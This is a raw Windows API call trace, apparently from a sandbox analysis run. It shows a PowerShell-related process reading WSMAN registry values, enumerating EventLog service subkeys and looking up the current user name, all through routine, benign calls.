	[0593.176] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x368dd0, lpcchValueName=0x22d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0593.176] CoTaskMemFree (pv=0x368dd0) 
	[0593.176] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0593.176] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x368dd0, lpcchValueName=0x22d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0593.176] CoTaskMemFree (pv=0x368dd0) 
	[0593.176] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0593.176] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x368dd0, lpcchValueName=0x22d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0593.176] CoTaskMemFree (pv=0x368dd0) 
	[0593.177] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d1cc, lpData=0x0, lpcbData=0x22d1c8*=0x0 | out: lpType=0x22d1cc*=0x1, lpData=0x0, lpcbData=0x22d1c8*=0x8) returned 0x0
	[0593.177] CoTaskMemAlloc (cb=0xc) returned 0x3c1f50
	[0593.177] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d19c, lpData=0x3c1f50, lpcbData=0x22d198*=0x8 | out: lpType=0x22d19c*=0x1, lpData="2.0", lpcbData=0x22d198*=0x8) returned 0x0
	[0593.177] CoTaskMemFree (pv=0x3c1f50) 
	[0595.366] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d188 | out: phkResult=0x22d188*=0x2f8) returned 0x0
	[0595.366] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d08c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d08c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d088*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0595.366] CoTaskMemFree (pv=0x0) 
	[0595.366] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0595.367] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x368dd0, lpcchValueName=0x22d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0595.367] CoTaskMemFree (pv=0x368dd0) 
	[0595.367] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0595.367] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x368dd0, lpcchValueName=0x22d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0595.367] CoTaskMemFree (pv=0x368dd0) 
	[0595.367] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0595.367] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x368dd0, lpcchValueName=0x22d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0595.367] CoTaskMemFree (pv=0x368dd0) 
	[0595.367] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d11c, lpData=0x0, lpcbData=0x22d118*=0x0 | out: lpType=0x22d11c*=0x1, lpData=0x0, lpcbData=0x22d118*=0x8) returned 0x0
	[0595.367] CoTaskMemAlloc (cb=0xc) returned 0x3c1f70
	[0595.367] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d0ec, lpData=0x3c1f70, lpcbData=0x22d0e8*=0x8 | out: lpType=0x22d0ec*=0x1, lpData="2.0", lpcbData=0x22d0e8*=0x8) returned 0x0
	[0595.367] CoTaskMemFree (pv=0x3c1f70) 
	[0595.369] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0595.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0595.369] CoTaskMemFree (pv=0x38e960) 
	[0596.286] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0596.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0596.286] CoTaskMemFree (pv=0x38e960) 
	[0596.292] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1b8 | out: phkResult=0x22d1b8*=0x2fc) returned 0x0
	[0596.296] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d12c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d128*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.296] CoTaskMemFree (pv=0x0) 
	[0596.299] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.299] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x0, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.299] CoTaskMemFree (pv=0x368dd0) 
	[0596.299] CoTaskMemFree (pv=0x0) 
	[0596.299] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.299] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x1, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.299] CoTaskMemFree (pv=0x368dd0) 
	[0596.299] CoTaskMemFree (pv=0x0) 
	[0596.299] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.299] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x2, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.299] CoTaskMemFree (pv=0x368dd0) 
	[0596.300] CoTaskMemFree (pv=0x0) 
	[0596.300] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.300] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x3, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.300] CoTaskMemFree (pv=0x368dd0) 
	[0596.300] CoTaskMemFree (pv=0x0) 
	[0596.300] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.300] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x4, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.300] CoTaskMemFree (pv=0x368dd0) 
	[0596.300] CoTaskMemFree (pv=0x0) 
	[0596.300] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.300] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x5, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.300] CoTaskMemFree (pv=0x368dd0) 
	[0596.300] CoTaskMemFree (pv=0x0) 
	[0596.300] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.300] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x6, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.301] CoTaskMemFree (pv=0x368dd0) 
	[0596.301] CoTaskMemFree (pv=0x0) 
	[0596.301] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.301] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x7, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.301] CoTaskMemFree (pv=0x368dd0) 
	[0596.301] CoTaskMemFree (pv=0x0) 
	[0596.301] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0596.301] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x8, lpName=0x368dd0, lpcchName=0x22d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0596.301] CoTaskMemFree (pv=0x368dd0) 
	[0596.301] CoTaskMemFree (pv=0x0) 
	[0596.301] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x324) returned 0x0
	[0596.301] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.301] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x1bc) returned 0x0
	[0596.302] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.302] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x1c4) returned 0x0
	[0596.302] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.302] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x1c0) returned 0x0
	[0596.302] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.302] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x314) returned 0x0
	[0596.302] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.302] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x328) returned 0x0
	[0596.302] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.303] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x32c) returned 0x0
	[0596.303] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.303] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x330) returned 0x0
	[0596.303] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x0) returned 0x2
	[0596.303] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x334) returned 0x0
	[0596.303] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d218 | out: phkResult=0x22d218*=0x338) returned 0x0
	[0596.303] RegCloseKey (hKey=0x338) returned 0x0
	[0596.303] RegCloseKey (hKey=0x2fc) returned 0x0
	[0596.304] RegCloseKey (hKey=0x334) returned 0x0
	[0597.406] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0597.406] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0597.408] CoTaskMemFree (pv=0x34dfb0) 
	[0597.409] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0597.409] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0597.409] CoTaskMemFree (pv=0x368dd0) 
	[0598.441] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d168 | out: phkResult=0x22d168*=0x33c) returned 0x0
	[0598.441] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.441] CoTaskMemFree (pv=0x0) 
	[0598.441] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.441] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.441] CoTaskMemFree (pv=0x368dd0) 
	[0598.441] CoTaskMemFree (pv=0x0) 
	[0598.442] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.442] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.442] CoTaskMemFree (pv=0x368dd0) 
	[0598.442] CoTaskMemFree (pv=0x0) 
	[0598.442] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.442] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.442] CoTaskMemFree (pv=0x368dd0) 
	[0598.442] CoTaskMemFree (pv=0x0) 
	[0598.442] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.442] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.442] CoTaskMemFree (pv=0x368dd0) 
	[0598.442] CoTaskMemFree (pv=0x0) 
	[0598.442] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.442] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.442] CoTaskMemFree (pv=0x368dd0) 
	[0598.442] CoTaskMemFree (pv=0x0) 
	[0598.442] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.443] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.443] CoTaskMemFree (pv=0x368dd0) 
	[0598.443] CoTaskMemFree (pv=0x0) 
	[0598.443] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.443] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.443] CoTaskMemFree (pv=0x368dd0) 
	[0598.443] CoTaskMemFree (pv=0x0) 
	[0598.443] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.443] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.443] CoTaskMemFree (pv=0x368dd0) 
	[0598.443] CoTaskMemFree (pv=0x0) 
	[0598.443] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.443] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.443] CoTaskMemFree (pv=0x368dd0) 
	[0598.443] CoTaskMemFree (pv=0x0) 
	[0598.443] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x340) returned 0x0
	[0598.444] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.444] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x344) returned 0x0
	[0598.444] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.444] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x348) returned 0x0
	[0598.444] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.444] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x34c) returned 0x0
	[0598.444] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.444] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x350) returned 0x0
	[0598.445] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.445] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x354) returned 0x0
	[0598.445] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.445] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x358) returned 0x0
	[0598.445] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.445] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x35c) returned 0x0
	[0598.445] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.445] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x360) returned 0x0
	[0598.445] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x364) returned 0x0
	[0598.446] RegCloseKey (hKey=0x364) returned 0x0
	[0598.446] RegCloseKey (hKey=0x33c) returned 0x0
	[0598.446] RegCloseKey (hKey=0x360) returned 0x0
	[0598.447] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d168 | out: phkResult=0x22d168*=0x360) returned 0x0
	[0598.447] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.447] CoTaskMemFree (pv=0x0) 
	[0598.447] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.447] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.447] CoTaskMemFree (pv=0x368dd0) 
	[0598.448] CoTaskMemFree (pv=0x0) 
	[0598.448] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.448] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.448] CoTaskMemFree (pv=0x368dd0) 
	[0598.448] CoTaskMemFree (pv=0x0) 
	[0598.448] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.448] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.448] CoTaskMemFree (pv=0x368dd0) 
	[0598.448] CoTaskMemFree (pv=0x0) 
	[0598.448] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.448] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.448] CoTaskMemFree (pv=0x368dd0) 
	[0598.448] CoTaskMemFree (pv=0x0) 
	[0598.448] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.448] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.448] CoTaskMemFree (pv=0x368dd0) 
	[0598.449] CoTaskMemFree (pv=0x0) 
	[0598.449] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.449] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.449] CoTaskMemFree (pv=0x368dd0) 
	[0598.449] CoTaskMemFree (pv=0x0) 
